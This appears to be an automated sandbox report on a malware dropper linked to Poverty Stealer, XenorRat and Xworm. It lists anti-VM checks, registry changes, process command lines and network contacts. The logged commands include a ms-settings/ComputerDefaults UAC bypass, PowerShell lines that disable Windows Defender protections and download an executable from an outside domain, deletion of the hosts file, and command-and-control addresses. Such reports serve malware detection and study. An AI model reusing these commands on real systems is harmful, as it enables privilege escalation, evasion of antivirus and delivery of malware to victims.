| N/A | N/A | N/A | N/A |
Poverty Stealer
Povertystealer family
XenorRat
Xenorat family
Xworm
Xworm family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
Reads user/profile data of web browsers
Indicator Removal: File Deletion
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2748 set thread context of 4944 | N/A | C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe | C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\System32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\System32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\System32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\System32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\System32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\System32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\wKQeiIr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\333.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\4637.vbs" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\6713.vbs" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\7871.vbs" | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\filer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\filer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe
"C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe"
C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe
"C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe"
C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe
"C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe"
C:\Users\Admin\AppData\Local\Temp\a\wKQeiIr.exe
"C:\Users\Admin\AppData\Local\Temp\a\wKQeiIr.exe"
C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe
"C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe"
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\6713.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\6713.vbs" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\cmd.exe
/c start /B ComputerDefaults.exe
C:\Windows\system32\ComputerDefaults.exe
ComputerDefaults.exe
C:\Windows\system32\wscript.exe
"wscript.exe" C:\Users\Admin\AppData\Local\Temp\6713.vbs
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
/c del /f C:\Users\Admin\AppData\Local\Temp\6713.vbs
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\4637.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\4637.vbs" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\cmd.exe
/c start /B ComputerDefaults.exe
C:\Windows\system32\ComputerDefaults.exe
ComputerDefaults.exe
C:\Windows\system32\wscript.exe
"wscript.exe" C:\Users\Admin\AppData\Local\Temp\4637.vbs
C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" interface ip set dns "Wi-Fi" dhcp
C:\Windows\system32\cmd.exe
/c del /f C:\Users\Admin\AppData\Local\Temp\4637.vbs
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\7871.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\7871.vbs" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\cmd.exe
/c start /B ComputerDefaults.exe
C:\Windows\system32\ComputerDefaults.exe
ComputerDefaults.exe
C:\Windows\system32\wscript.exe
"wscript.exe" C:\Users\Admin\AppData\Local\Temp\7871.vbs
C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" interface ip set dns "Ethernet" dhcp
C:\Windows\system32\cmd.exe
/c del /f C:\Users\Admin\AppData\Local\Temp\7871.vbs
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Users\Admin\AppData\Local\Temp\a\filer.exe
"C:\Users\Admin\AppData\Local\Temp\a\filer.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\a\filer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe
"C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri "https://ratsinthehole.com/vvvv/yVdlbFlx" -OutFile "C:\Users\Public\Guard.exe""
C:\Windows\System32\Wbem\wmic.exe
wmic os get Caption
C:\Windows\System32\Wbem\wmic.exe
wmic cpu get Name
C:\Windows\System32\Wbem\wmic.exe
wmic path win32_VideoController get name
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe
"C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe"
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\a\333.exe
"C:\Users\Admin\AppData\Local\Temp\a\333.exe"
C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe
"C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe"
C:\Users\Admin\AppData\Local\Temp\a\test12.exe
"C:\Users\Admin\AppData\Local\Temp\a\test12.exe"
C:\Users\Admin\AppData\Local\Temp\a\test6.exe
"C:\Users\Admin\AppData\Local\Temp\a\test6.exe"
C:\Users\Admin\AppData\Local\Temp\a\test14.exe
"C:\Users\Admin\AppData\Local\Temp\a\test14.exe"
C:\Users\Admin\AppData\Local\Temp\a\pantest.exe
"C:\Users\Admin\AppData\Local\Temp\a\pantest.exe"
C:\Users\Admin\AppData\Local\Temp\a\test9.exe
"C:\Users\Admin\AppData\Local\Temp\a\test9.exe"
C:\Users\Admin\AppData\Local\Temp\a\test10-29.exe
"C:\Users\Admin\AppData\Local\Temp\a\test10-29.exe"
C:\Users\Admin\AppData\Local\Temp\a\test19.exe
"C:\Users\Admin\AppData\Local\Temp\a\test19.exe"
C:\Users\Admin\AppData\Local\Temp\a\test10.exe
"C:\Users\Admin\AppData\Local\Temp\a\test10.exe"
C:\Users\Admin\AppData\Local\Temp\a\test_again4.exe
"C:\Users\Admin\AppData\Local\Temp\a\test_again4.exe"
C:\Users\Admin\AppData\Local\Temp\a\test23.exe
"C:\Users\Admin\AppData\Local\Temp\a\test23.exe"
C:\Users\Admin\AppData\Local\Temp\a\test5.exe
"C:\Users\Admin\AppData\Local\Temp\a\test5.exe"
C:\Users\Admin\AppData\Local\Temp\a\test11.exe
"C:\Users\Admin\AppData\Local\Temp\a\test11.exe"
C:\Users\Admin\AppData\Local\Temp\a\test20.exe
"C:\Users\Admin\AppData\Local\Temp\a\test20.exe"
C:\Users\Admin\AppData\Local\Temp\a\test_again3.exe
"C:\Users\Admin\AppData\Local\Temp\a\test_again3.exe"
C:\Users\Admin\AppData\Local\Temp\a\test16.exe
"C:\Users\Admin\AppData\Local\Temp\a\test16.exe"
C:\Users\Admin\AppData\Local\Temp\a\test13.exe
"C:\Users\Admin\AppData\Local\Temp\a\test13.exe"
C:\Users\Admin\AppData\Local\Temp\a\test_again2.exe
"C:\Users\Admin\AppData\Local\Temp\a\test_again2.exe"
C:\Users\Admin\AppData\Local\Temp\a\test15.exe
"C:\Users\Admin\AppData\Local\Temp\a\test15.exe"
C:\Users\Admin\AppData\Local\Temp\a\test18.exe
"C:\Users\Admin\AppData\Local\Temp\a\test18.exe"
C:\Users\Admin\AppData\Local\Temp\a\test21.exe
"C:\Users\Admin\AppData\Local\Temp\a\test21.exe"
C:\Users\Admin\AppData\Local\Temp\a\test22.exe
"C:\Users\Admin\AppData\Local\Temp\a\test22.exe"
C:\Users\Admin\AppData\Local\Temp\a\test8.exe
"C:\Users\Admin\AppData\Local\Temp\a\test8.exe"
C:\Users\Admin\AppData\Local\Temp\a\test7.exe
"C:\Users\Admin\AppData\Local\Temp\a\test7.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| AT | 185.244.212.106:2227 | tcp | |
| US | 8.8.8.8:53 | 106.212.244.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beastsband.com | udp |
| US | 85.209.133.150:4444 | beastsband.com | tcp |
| US | 8.8.8.8:53 | 150.133.209.85.in-addr.arpa | udp |
| US | 85.209.133.150:4444 | beastsband.com | tcp |
| US | 85.209.133.150:4444 | beastsband.com | tcp |
| US | 85.209.133.150:4444 | beastsband.com | tcp |
| US | 85.209.133.150:4444 | beastsband.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 68.178.207.33:8000 | 68.178.207.33 | tcp |
| US | 68.178.207.33:8000 | 68.178.207.33 | tcp |
| US | 68.178.207.33:8000 | 68.178.207.33 | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 68.178.207.33:7000 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
